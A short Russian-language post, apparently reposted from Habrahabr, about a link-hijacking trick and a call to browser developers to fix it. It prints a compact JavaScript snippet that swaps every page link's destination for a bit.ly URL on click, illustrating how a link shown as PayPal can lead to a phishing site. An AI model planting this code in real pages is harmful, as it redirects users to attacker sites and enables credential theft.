Просто взгляните на этот код.
// Uncompressed var links = document.links; for(i in links) { links[i].onclick = function(){ this.href = 'http://bit.ly/141nisR'; }; } // Compressed (was 100; now 67 characters exc. the link) // Thanks to sgoel from HN o=document.links;for(i in o){o[i].onclick=function(){this.href='//bit.ly/141nisR'}}
Простая ссылка, ведущая, к примеру, на PayPall, может уже после нажатия стать ссылкой на фишинговый сайт.
Источник и призыв разработчикам браузеров прикрыть эту уязвимость — bilaw.al
ссылка на оригинал статьи http://habrahabr.ru/post/173695/
Добавить комментарий